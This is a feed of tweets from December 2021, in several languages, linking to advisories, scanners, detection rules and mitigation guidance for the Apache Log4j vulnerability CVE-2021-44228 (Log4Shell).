2021-12-22 17:01:05Just for the record, when we recorded this “12 Days of Malware,” CVE-2021-44228 had not been disclosed yet. https://t.co/5oZNthEPnp https://twitter.com/RayRedacted/status/1473057415088193545CyberPlayGround
2021-12-22 17:00:15Fortis Log4j CVE-2021-44228 Communication Release Read the entire blog post here: https://t.co/Jm3rhIeyYS… https://t.co/tnjPksj7JY https://www.sentinel.com/Blog#222 https://twitter.com/i/web/status/1473699627891367941FortisBySTI
2021-12-22 16:52:16Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/G5nxcWuOrI https://dy.si/BC5jaG2fverdugo_vmware
2021-12-22 16:50:26&gt; Malicious cyber actors are actively scanning networks to potentially exploit CVE-2021-44228 (known as “Log4Shell”… https://t.co/dWsBQshXkQ https://twitter.com/i/web/status/1473696879993307136jj1lfc
2021-12-22 16:22:39The #Log4Shell (CVE-2021-44228) vulnerability is an imminent threat to organizations! Our Salt Labs researchers giv… https://t.co/1kRCldha1s https://twitter.com/i/web/status/1473687287951245327SaltSecurity
2021-12-22 16:19:36#WARNING! Wir wollen euch über die kritische #Schwachstelle #Apache Log4j (CVE-2021-44228, CVE-2021-45105 &amp; CVE-20… https://t.co/rJdKnj6LQs https://twitter.com/i/web/status/1473676663527460864_premierexperts
2021-12-22 16:10:36CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/pHjoJOYT9s https://t.co/bBzzq9SWaI http://dlvr.it/SFsBHLFreakBizarro
2021-12-22 16:10:13Log4j RCE vulnerability explained with bypass for the initial fix (CVE-2021-44228, CVE-2021-45046)… https://t.co/Uob7GojPpA https://twitter.com/i/web/status/1473687258771476481FreakBizarro
2021-12-22 16:00:16CISAがCVE-2021-44228やCVE-2021-45046といったLog4jの脆弱性(Log4Shell)のスキャナーをリリースし、主な機能は以下とのことです。 - URLリストのサポート - HTTPリクエストヘッダー… https://t.co/Fxwtnb3sPe https://twitter.com/i/web/status/1473683957099417606MasaKAMAYAMA
2021-12-22 15:51:49Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distribut... https://t.co/55Z4aK9WiJ https://dy.si/ZXnMhdsimelka
2021-12-22 15:30:48[Recomendado]Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/HBre6NHfWR #seguridadsi #ciberseguridad https://zpr.io/DfhPk5cmHvKGseguridad_si
2021-12-22 15:24:05CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/rWF5av5tFG https://ift.tt/3ehZ72sFreakBizarro
2021-12-22 15:23:57Log4j RCE vulnerability explained with bypass for the initial fix (CVE-2021-44228, CVE-2021-45046) https://t.co/tKAivySeff https://ift.tt/3yP2I1tFreakBizarro
2021-12-22 15:23:40更新:Apache Log4j の脆弱性対策について(CVE-2021-44228):IPA | &gt; 特定の構成の場合、Apache Log4j 1 系のバージョンにおいても本脆弱性の影響を受ける可能性があるとのことです。… https://t.co/1bXRvsMTpi https://twitter.com/i/web/status/1473672563851407360chie_0218
2021-12-22 15:22:27Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/wXBwev9AsF #VMware #infosec https://zpr.io/DfhPk5cmHvKGinfosecindustry
2021-12-22 15:11:36Arctic Wolf, stellt das Detection Script „#Log4Shell Deep Scan“ zur Erkennung von CVE-2021-45046 und CVE-2021-44228… https://t.co/Cjd7C2gh8F https://twitter.com/i/web/status/1473669671392100357it__security
2021-12-22 14:51:25Observation of Attacks Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228) https://t.co/fUtmlvelMt #log4j #cybersecurity https://blogs.jpcert.or.jp/en/2021/12/log4j-cve-2021-44228.htmlGate_15_Analyst
2021-12-22 14:50:41Geen paniek, de check op #log4shell oftewel CVE-2021-44228 is niet echt verwijderd uit #InsightVM van Rapid7. Een h… https://t.co/rrydkzmCeR https://twitter.com/i/web/status/1473666753146335238TWFpa2Vs
2021-12-22 14:20:54GitHub - fireeye/CVE-2021-44228: OpenIOC rules to facilitate hunting for indicators of compromise https://t.co/zY6k8q5ud6 https://github.com/fireeye/CVE-2021-44228Secnewsbytes
2021-12-22 14:10:12Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns | Official Juniper Networks Blogs https://t.co/G9epT5nQEU https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns_x13
2021-12-22 13:50:20Microsoft's Response to CVE-2021-44228 Apache Log4j 2 - Microsoft Security Response Center https://t.co/oX8tJWuXWd https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/fernand0
2021-12-22 13:30:26#231 NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開|水曜 ヤマダ - SHIFT SECURITY @shiftsecurity https://t.co/j6GzWsYWeN #Voicy https://voicy.jp/channel/1188/252438runfuru
2021-12-22 13:20:17@Usmanatif6 According to the advisory they released patches. See: CVE-2021-44228/CVE-2021-45046 Advisory for Oracl… https://t.co/iOqsZDeWuC https://twitter.com/i/web/status/1473643657265827840oraclebase
2021-12-22 13:00:11Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/jNk0Icl8PJ via @YouTube https://youtu.be/0-abhd-CLwQMichelBakhtaoui
2021-12-22 11:50:26log4j-detector v2021.12.22 releases: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your fil… https://t.co/GwqBLHdTJ6 https://twitter.com/i/web/status/1473619386300780544the_yellow_fall
2021-12-22 11:50:17The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/JlyCyLrGl2 https://twitter.com/i/web/status/1473620726188023809Menardconnect
2021-12-22 11:40:12CVE-2021-44228に対応するために休暇と有給取れそうな場所を潰されている間に現実世界の時間が消費されていく。早く犯人逮捕されて欲しいsun_null_ptr
2021-12-22 11:30:08🔴 Demo: Detecting &amp; Preventing #Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS… https://t.co/3z7N4XOi32 https://twitter.com/i/web/status/1473615762837450755AzizAqeelVM
2021-12-22 11:10:13This is cool. A repo consolidating all CVE-2021-44228 related rules ET is writing, with lots of documentation along… https://t.co/TQuJh4PzLT https://twitter.com/i/web/status/1473610457445548037jufajardini
2021-12-22 11:10:11🚩New vulnerability: Apache OFBiz Cookie request header log4shell RCE vulnerability (CVE-2021-44228) (RedTeam versio… https://t.co/EGC0OgPKVh https://twitter.com/i/web/status/1473611156279676928GobySec
2021-12-22 11:10:08🚩New vulnerability: Apache Log4j2 JNDI RCE vulnerability(HTTP header fuzz)(CVE-2021-44228) (RedTeam version)#Goby… https://t.co/7x4sMtcgHA https://twitter.com/i/web/status/1473611413889634304GobySec
2021-12-22 10:30:12having fun with log4shell.. CVE-2021-44228 #Log4Shell #Pentesting .. https://t.co/f3o1XOnAjexen0vas
2021-12-22 10:30:04Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS https://t.co/LmBqYQLCbJ https://dy.si/qZfafxAAmoroso77
2021-12-22 10:20:10RCE in Unifi Network Application using #log4j/#log4shell. (CVE-2021-44228) Going to be automating this and writing… https://t.co/7axnQjbyJb https://twitter.com/i/web/status/1473598950309613570d34dr4bbit
2021-12-22 10:10:12The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/h4BMuFVp0B https://t.co/ayMBqwOtRM https://bit.ly/3FlshtoBilekSimon
2021-12-22 10:10:10The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/Mgnp9SCfur https://t.co/7lYpZelcO1 https://bit.ly/30On7HeBilekSimon
2021-12-22 09:50:07Security Bulletin: Log4j Vulnerability ( CVE-2021-44228 ) in IBM Informix Dynamic Server in Cloud Pak for Data https://t.co/bJlE7bmVhg https://www.ibm.com/blogs/psirt/security-bulletin-log4j-vulnerability-cve-2021-44228-in-ibm-informix-dynamic-server-in-cloud-pak-for-data/cybsecbot
2021-12-22 09:20:08Introducing Log4Shell Sentinel, a file-based #Log4Shell #log4j #CVE-2021-44228 that's a lot smarter than your ave… https://t.co/zjVp2widDg https://twitter.com/i/web/status/1473582194677350400securityfu
2021-12-22 09:00:29Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/JqHVbmcDNi via @YouTube https://youtu.be/w2F67LbEtnknotadilnaqvi
2021-12-22 09:00:05log4j-CVE-2021-44228-vulhub复现 https://t.co/MnuoWu7Lkp https://t.co/JdqMSX4R01 https://ift.tt/3JcA8LY https://ift.tt/3efIcgRbuaqbot
2021-12-22 08:11:21Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/qDp07PsVF3 ---… https://t.co/bMS50Cy8Gb https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ https://twitter.com/i/web/status/1473564515501768704TWCERTCC
2021-12-22 08:11:20Apache James の Apache Log4j に任意のコードを実行される複数の問題 (CVE-2021-44228, CVE-2021-45 [40876] https://t.co/Cf5zsOAWtq #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40876softek_jp
2021-12-22 08:11:14The prevalence of indicators associated with #Log4j (CVE-2021-44228) now seen in 82 countries and across multiple s… https://t.co/Slr5Pks5kl https://twitter.com/i/web/status/1473565217326084097Raj_Samani
2021-12-22 08:10:58mergebase/log4j-detector: Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) https://t.co/IZ8Pc9v7Et https://github.com/mergebase/log4j-detectorLuna_0x01
2021-12-22 08:00:04Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/mwCJNmJlMk https://dy.si/qmPZ342mvandenhelm
2021-12-22 06:51:13Synack社がCVE-2021-44228(log4j) へのお客様支援、オンデマンドセキュリティテストの提供を開始いたしました。 #log4j #Synack #cybersecurity https://t.co/AIJItadhOs https://twitter.com/SynackJ/status/1471317258509365248redteam_japan
2021-12-22 06:10:44@mtrainier2021 是那个史诗级漏洞 CVE-2021-44228吧jiacuo
2021-12-22 06:00:29#Chromium based browser are NOT affected by CVE-2021-44228 alias #log4j vulnerability https://t.co/Dma2UZxI1s https://security.googleblog.com/2021/12/apache-log4j-vulnerability.html?m=1CKsTechNews
2021-12-22 06:00:12|@TrendMicroRSRCH suit activement #Log4Shell, alias CVE-2021-44228. Cette vulnérabilité critique affecte plusieurs… https://t.co/Typx0krsrO https://twitter.com/i/web/status/1473533766001954818TechData_FR
2021-12-22 05:40:25Burp Bounty Pro and Burp Bounty Free CVE-2021-44228 Log4j RCE profile Burp Bounty Pro users… https://t.co/NYUoVVX4Sf https://twitter.com/i/web/status/1473526478679818245PentestPlanet
2021-12-22 05:00:13「SIDfm の監視対象製品への影響」に製品情報を追加・更新しました。(2021年12月22日) Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト | SIDfm ブログ https://t.co/fAwr9W3IwQ https://www.softek.co.jp/SID/blog/archive/entry/20211215.htmlsoftek_jp
2021-12-22 04:41:26Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/Ty6r0QOGwP https://twitter.com/i/web/status/1473511375414697994shufenchia
2021-12-22 04:41:24Apache Log4j Security Alert CVE-2021-44228 관련하여 ( https://t.co/2WCtlo77yt ) Oracle SQL Developer 도 Log4j 이슈가 있습니다.… https://t.co/lNO9fTGv00 https://blogs.oracle.com/security/post/cve-2021-44228 https://twitter.com/i/web/status/1473511939854987264mlmcorea
2021-12-22 04:23:15更新:Apache Log4j の脆弱性対策について(CVE-2021-44228):IPA 独立行政法人 情報処理推進機構 https://t.co/CIZgIvHBKM https://www.ipa.go.jp/security/ciadr/vul/alert20211213.htmlSomeoneMentsuyu
2021-12-22 04:00:23"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeVMy9 Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-22 03:53:11IT Risk: Citrix.CVE-2021-44228 and related vulnerabilities (UPDATE) in Endpoint Management (Citrix XenMobile Server… https://t.co/jTXMRsBkIw https://twitter.com/i/web/status/1473500526914711553management_sun
2021-12-22 03:52:50IT Risk: Citrix.CVE-2021-44228 and related vulnerabilities (UPDATE) in Endpoint Management (Citrix XenMobile Server… https://t.co/A6Op74Vm0V https://twitter.com/i/web/status/1473500528437264384management_sun
2021-12-22 03:52:31IT Risk: Citrix.CVE-2021-44228 and related vulnerabilities (UPDATE) in Endpoint Management (Citrix XenMobile Server… https://t.co/kUlXSHsnXP https://twitter.com/i/web/status/1473500530014310405management_sun
2021-12-22 03:45:30Log4Shell sample vulnerable application (CVE-2021-44228) https://t.co/yIJ1Zg2mzo https://lnkd.in/eZXQY8czBootcampSCL
2021-12-22 02:44:53記事を投稿しました! CVE-2021-44228 の Log4j 1.x への影響を調査しました [Java] on #Qiita https://t.co/5oAdjuXscL https://qiita.com/juno_rmks/items/163eacb8c13f81e143e7?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharejuno_rmks
2021-12-22 02:36:05記事を投稿しました! CVE-2021-44228 の Log4j 1.x への影響を調査しました [Java] on #Qiita https://t.co/5oAdjuXscL https://qiita.com/juno_rmks/items/163eacb8c13f81e143e7?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharejuno_rmks
2021-12-22 02:30:20Log4j-scan:- A fully automated, accurate, &amp; extensive #Scanner for finding log4j RCE CVE-2021-44228 #LinkClick:-… https://t.co/zjxJkHTcSb https://twitter.com/i/web/status/1473480912822222850NationalCyberS1
2021-12-22 02:20:51記事を投稿しました! CVE-2021-44228 の Log4j 1.x への影響を調査しました [Java] on #Qiita https://t.co/5oAdjuXscL https://qiita.com/juno_rmks/items/163eacb8c13f81e143e7?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharejuno_rmks
2021-12-22 02:15:48Observation of Attacks Targeting Apache #Log4j2 RCE Vulnerability (CVE-2021-44228) https://t.co/SobnFWLukE https://blogs.jpcert.or.jp/en/2021/12/log4j-cve-2021-44228.htmlCyber_O51NT
2021-12-22 02:00:22Preventing Log4j CVE-2021-44228 Exploits Using PDF As A Delivery #infosec #infosecurity #cybersecurity #threatintel… https://t.co/ISuRe3JKBl https://twitter.com/i/web/status/1473473163879239687CyberIQs_
2021-12-22 01:52:35【弊社製品のお知らせ】 2021年12月11日にJPCERTコーディネーションセンターよりApache Log4j ライブラリの脆弱性 (CVE-2021-44228)が発表されました。弊社製品では「Apache Log4j」を使… https://t.co/yA4U1FkNOv https://twitter.com/i/web/status/1473469480349347844arces_sendai
2021-12-22 01:52:03Preventing Log4j CVE-2021-44228 Exploits Using PDF As A Delivery Channel https://t.co/LflTfOVlVM https://securityboulevard.com/2021/12/preventing-log4j-cve-2021-44228-exploits-using-pdf-as-a-delivery-channel/security_inside
2021-12-22 01:46:23The latest update for #Cyberint includes "#Log4j Incident Update – Dramatic Turn of Events" and "CVE-2021-44228: Lo… https://t.co/boF7UOkldP https://twitter.com/i/web/status/1473466520739139587opsmatters_uk
2021-12-22 01:42:06New Blog Post: Observation of Attacks Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228) ^YU https://t.co/PfXa2HcIHO https://blogs.jpcert.or.jp/en/2021/12/log4j-cve-2021-44228.htmljpcert_en
2021-12-22 01:40:27IT Risk: https://t.co/OswfMNFlPD Products CVE-2021-44228 Related Vulnerabilities (UPDATE) -1/2 December 22 2021: Ve… https://t.co/abJbSAwUQw http://Juniper.Juniper https://twitter.com/i/web/status/1473468318187421700management_sun
2021-12-22 01:32:47IT Risk: VMWare.VMWare productsにCVE-2021-44228関連する複数の脆弱性(UPDATE)-1/2 December 22 2021: Vendor revised the advisory… https://t.co/MvhUR6B8eu https://twitter.com/i/web/status/1473464223372312578management_sun
2021-12-22 01:32:32The recent hot topic on CVE-2021-44228 is waving everywhere. Bevywise's top priority remains the #security of our… https://t.co/QuJzt8Jg9k https://twitter.com/i/web/status/1473464306108825603BevyWise
2021-12-22 01:31:57IT Risk: VMWare.Multiple vulnerabilities (UPDATE) related to CVE-2021-44228 in VMWare products -1/2 December 22 202… https://t.co/wBRdPiPcFn https://twitter.com/i/web/status/1473464384416804864management_sun
2021-12-22 01:31:36CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応 – Microsoft Security Response Center https://t.co/pR27E6B8OS #technology #security https://msrc-blog.microsoft.com/2021/12/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/G76whizkidz
2021-12-22 01:20:36🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ve5j1VuS8F https://twitter.com/i/web/status/1473463183595773956threatintelctr
2021-12-22 01:15:15NTTからレポート出ている! Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/RyKD16d52x https://www.intellilink.co.jp/column/vulner/2021/121500.aspxSC_consortium
2021-12-22 01:13:30The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/0PIpIoqMMd https://twitter.com/i/web/status/1473458805489160195velez1066
2021-12-22 01:01:06The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/TFadjRPXMU https://twitter.com/i/web/status/1473457444193976330velez1066
2021-12-22 01:00:50The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/ox4oP127R6 https://twitter.com/i/web/status/1473457597290323970velez1066
2021-12-22 01:00:33On December 9, 2021, a bug (CVE-2021-44228) impacting multiple versions of the Apache Log4j2 utility was disclosed… https://t.co/PnLre8QQ6Y https://twitter.com/i/web/status/1473457972953194497eccentriccarla
2021-12-22 00:50:52"The Apache Log4j vulnerability (CVE-2021-44228) is on the mind of nearly every cybersecurity and IT team right now… https://t.co/veXrbRwkEr https://twitter.com/i/web/status/1473455492181762058LookingPoint
2021-12-21 23:51:43.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/hKEjS9xuEu https://twitter.com/i/web/status/1473439201114873861Woronka
2021-12-21 23:23:51Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS https://t.co/bltozVtrkT https://dy.si/sG7KG7azaelcolon
2021-12-21 23:14:58CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-21 23:14:27Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228) https://t.co/7NTSmdLzaJ https://github.com/lucab85/log4j-cve-2021-44228TechTweetBot
2021-12-21 23:00:14【危機管理トピックス】警察庁 Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について https://t.co/Rb2RHLiYT5 #企業危機管理 #Java… https://t.co/Kbji5pmNRf https://www.npa.go.jp/cyberpolice/important/2021/202112141.html https://twitter.com/i/web/status/1473428070178734091SP_Network_jp
2021-12-21 22:51:09一昨日のブログは、12/11に #JPCERT/CC が注意喚起した、 #Apache #Log4j の任意コード実行の #脆弱性 (CVE-2021-44228) について書きました。 オープンソースかどうかにかかわらず、外部の… https://t.co/fOqoTbAlTW https://twitter.com/i/web/status/1473423534932307972crosslaboratory
2021-12-21 22:50:44An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/mt31Pg4Wpc https://twitter.com/i/web/status/1473424175138226181ProductCERT
2021-12-21 22:43:00Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 D... https://t.co/EhaNKaNNDb via @vmwarensx https://youtu.be/b9HfIXg11sIvcixnv
2021-12-21 22:30:38CVE-2021-44228, Log4J 2 / Log4Shell Security Advisory for Notes, Domino, Verse, and Traveler https://t.co/nqTxzxLbGP https://support.hcltechsw.com/csm?id=kb_article&sys_id=d8490e181b2cc590a2f48661cd4bcb15&spa=1Sever_i
2021-12-21 22:23:2824 new OPEN, 35 new PRO (24 + 11). More CVE-2021-44228, OWOWA Stealer, CoinMiners Thanks @Securelist,… https://t.co/Rb513sy0qR https://twitter.com/i/web/status/1473416870179086348ET_Labs
2021-12-21 21:50:47Remediate the Log4Shell/LogJam vulnerability (CVE-2021-44228) using osquery tables, compiled here is a reference gu… https://t.co/I5gEhVYkcQ https://twitter.com/i/web/status/1473410195409747968uptycs
2021-12-21 21:25:13Log4Shell (CVE-2021-44228) AttackIQ Technical Demo Assess how vulnerable your security controls are and if they a… https://t.co/yoXX14bof7 https://twitter.com/i/web/status/1473229622045257728FinkeHarkonen
2021-12-21 21:24:12Following the recent Log4j CVE-2021-44228 vulnerability, Juniper Threat Labs continues to monitor attacks and shift… https://t.co/CX7WzyFU1W https://twitter.com/i/web/status/1473402663748485134JuniperNetworks
2021-12-21 20:54:01CVE-2021-44228, Log4J 2 / Log4Shell Security Advisory for Beta Domino REST API https://t.co/zh2lr1EceX https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095728Eknori
2021-12-21 20:53:19Hunting for Log4j CVE-2021-44228 (Log4Shell) Exploit Activity #hunting #log4j2 #exploit https://t.co/hGQIIROCLA https://lnkd.in/gkMW8j4isecurityjwd
2021-12-21 20:40:47Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS https://t.co/SuAlHfBxvu https://dy.si/jJCevpscandaletti
2021-12-21 20:40:30Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/2Po1oItlK4 https://www.youtube.com/watch?v=w2F67LbEtnkPwnySlaystation
2021-12-21 20:22:13@petercoffee #CIO #cybersecurity “release closed hole (CVE-2021-44228) by disabling by default the Java library's p… https://t.co/oPw3FyPlHl https://twitter.com/i/web/status/1473386131571970049garyrikard
2021-12-21 20:14:55Find out what you need to know about the #Log4Shell (CVE-2021-44228) vulnerability in this new post ➡️… https://t.co/xQmQCubpnR https://twitter.com/i/web/status/1473383189179678723SaltSecurity
2021-12-21 20:01:21Dumb question: Anyone know of a vulnerable app with CVE-2021-44228 that can be used for testing? I want to blow it up in a VM. Thanks!demon117
2021-12-21 20:00:10Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/pIE5w0eYgB https://bit.ly/3phcGpbBinaryBlogger
2021-12-21 19:53:32The great thing about a Mirai variant spreading via log4j CVE-2021-44228 is that by default Mirai kills SSH, Port 8… https://t.co/Bvk0PzW1gR https://twitter.com/i/web/status/1473378527030308864MalwareTechBlog
2021-12-21 19:37:35Log4Shell (CVE-2021-44228) AttackIQ Technical Demo Assess how vulnerable your security controls are and if they a… https://t.co/yoXX14bof7 https://twitter.com/i/web/status/1473229622045257728FinkeHarkonen
2021-12-21 19:30:25Important and timely information on how to detect any impact from CVE-2021-44228 (#Apache #Log4j2 vulnerability),… https://t.co/ZxW0S8mp6J https://twitter.com/i/web/status/1473373076914114563Bonniesewick
2021-12-21 19:00:32In light of the publicly announced CVE-2021-44228, also known as Log4j, Atlantic Data Security has proactively gath… https://t.co/a2AtCynaLk https://twitter.com/i/web/status/1473365984769679360AtlanticDataSec
2021-12-21 18:50:03CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell) | Qualys Security Blog #Cybersecurity… https://t.co/ATXwmTqxpn https://twitter.com/i/web/status/1473365077868830726JPMConsulting_
2021-12-21 18:40:26Log4j reactions from the new guy: CVE-2021-4104, no big. CVE-2021-44228, Fuuuuuuuuuuuuu. CVE-2021-45046, Damnit. CVE-2021-45105, Come on.samuelali
2021-12-21 18:40:04Thank you CVE-2021-44228 for shutting down my jobs system so we just need to babysit the kiosk instead of doing real work 😆sethreign8103
2021-12-21 18:23:20Learn about the Log4j (CVE-2021-44228) vulnerability, how you may be impacted, and what JDL Tech is doing about it.… https://t.co/EYOpidrz1v https://twitter.com/i/web/status/1473353734742814724jdltechnologies
2021-12-21 18:22:26Released 11th December, "Docker scan to detect Log4j 2 CVE-2021-44228" update prompt arrived only today Somehow I… https://t.co/KG1ZtNTWf1 https://twitter.com/i/web/status/1473356554439168005ofraski
2021-12-21 18:21:19.@printixnet and CVE-2021-44228 and CVE-2021-45046 https://t.co/4kNZNnb3rW https://printix.net/blog/printix-cve-2021-44228-cve-2021-45046geoffwilbur
2021-12-21 18:05:22#GoogleCloud Armor WAF Rule To Help Mitigate CVE-2021-44228 Apache Log4j Vulnerability #Google #cyberthreats… https://t.co/pXAWpVU0Ex https://twitter.com/i/web/status/1473302364094283779gcpdotcom
2021-12-21 17:47:01#GoogleCloud Armor WAF Rule To Help Mitigate CVE-2021-44228 Apache Log4j Vulnerability #Google #cyberthreats… https://t.co/pXAWpVU0Ex https://twitter.com/i/web/status/1473302364094283779gcpdotcom
2021-12-21 17:31:04The Numbers Behind Log4j CVE-2021-44228 - Check Point Software https://t.co/fbfl65PHo1 https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/#.YcINP-trMJ0.twittergascat2002
2021-12-21 17:25:33#GoogleCloud Armor WAF Rule To Help Mitigate CVE-2021-44228 Apache Log4j Vulnerability #Google #cyberthreats… https://t.co/pXAWpVU0Ex https://twitter.com/i/web/status/1473302364094283779gcpdotcom
2021-12-21 17:03:57#GoogleCloud Armor WAF Rule To Help Mitigate CVE-2021-44228 Apache Log4j Vulnerability #Google #cyberthreats… https://t.co/pXAWpVU0Ex https://twitter.com/i/web/status/1473302364094283779gcpdotcom
2021-12-21 17:02:34Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/bgH3YiwYR7 https://twitter.com/i/web/status/14733364706478407731mikemcclure
2021-12-21 16:52:00Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS https://t.co/MnLy9ZgIpn https://dy.si/w8rmHb2_lsmatos
2021-12-21 16:44:29Dealing with log4shell aka CVE-2021-44228 aka the log4j version 2 https://t.co/xgR0WlziZL #CyberSecurity #digital… https://t.co/SC0htSqCE1 http://dlvr.it/SFnyyJ https://twitter.com/i/web/status/1473330056902545415reach2ratan
2021-12-21 16:31:02#VMware #Security #Log4j #RunNSX #IDS #IPS - Demo: #Detecting &amp; #Preventing #Log4Shell (CVE-2021-44228) with #NSX-T… https://t.co/cC4KoGqtCQ https://twitter.com/i/web/status/1473328986423918595WaldemarPera
2021-12-21 16:22:43Log4Shell ( CVE-2021-44228 and CVE-2021-45046) - Leaves affected versions of Log4j packages vulnerable to Remote Co… https://t.co/C9LEsahEAP https://twitter.com/i/web/status/1473326766198382597hlosukwakha
2021-12-21 15:52:01CVE-2021-44228 « LOG4SHELL » – Vulnérabilité criique dans LOG4J massivement exploitée https://t.co/8U2OEiIXoY https://bit.ly/3JjrN9EGS_Mag
2021-12-21 15:21:01承前 "Log4Shellの脆弱性に関する更新情報 Log4Shell脆弱性のCVE-2021-44228に関連する2つの追加CVE、CVE-2021-4104とCVE-2021-45046が公開、最新情報が提供されました。 L… https://t.co/96gqvZd2Ty https://twitter.com/i/web/status/1473310677309997058kabukawa
2021-12-21 15:20:56Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/KqVgxSq12D https://twitter.com/i/web/status/1473310767357337606dangmoz
2021-12-21 15:20:53Trustwave's Action Response: Log4j Zero-Day Vulnerability CVE-2021-44228 - Trustwave https://t.co/jmfeLvxwox https://www.trustwave.com/en-us/resources/blogs/trustwave-blog/trustwaves-action-response-log4j-zero-day-vulnerability-cve-2021-44228/mark97052356
2021-12-21 15:20:44Ivanti's response to the #Apache #Log4J Vulnerability #CVE-2021-44228. Sign-in for further updates at:… https://t.co/hFdItqUd2T https://twitter.com/i/web/status/1473311300499476481GoIvanti
2021-12-21 15:10:05#Log4Shell #log4j CVE-2021-44228 It looks like NIST updated the CVSS to 10.0 on this CVE entry yesterday. Up unti… https://t.co/NQCK2afaUy https://twitter.com/i/web/status/1473309311363211265TomSellers
2021-12-21 14:55:24VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/qJyQ461iFe https://dy.si/9beWBalexganser
2021-12-21 14:46:21RCE in Unifi Network Application using #log4j/#log4shell. (CVE-2021-44228) Going to be automating this and writing… https://t.co/UZUdnGcCWh https://twitter.com/i/web/status/1473301038832701441sprocket_ed
2021-12-21 14:41:49@Umberto_Rapetto @infosec202002 Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 MSRC / By MSRC Team / Decem… https://t.co/iSs71akV5w https://twitter.com/i/web/status/147330129604428595442Sz40
2021-12-21 14:41:05@jcnars Please review the following resources: -Security Alert CVE-2021-44228 Blog - https://t.co/VIAX4n3DhW -Orac… https://t.co/iZhjILvaaP https://social.ora.cl/6015JLzEV https://twitter.com/i/web/status/1473301940562022408myoraclesupport
2021-12-21 14:31:13🔥🔥🔥 A vulnerability in Apache Log4j, also known as CVE-2021-44228, a widely used logging package for Java has been… https://t.co/yO53S5YvRd https://twitter.com/i/web/status/1473299074120048645ArienneT1972
2021-12-21 14:23:23Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/PLSFudJSb1 https://dy.si/FrbbQumacboyvictor
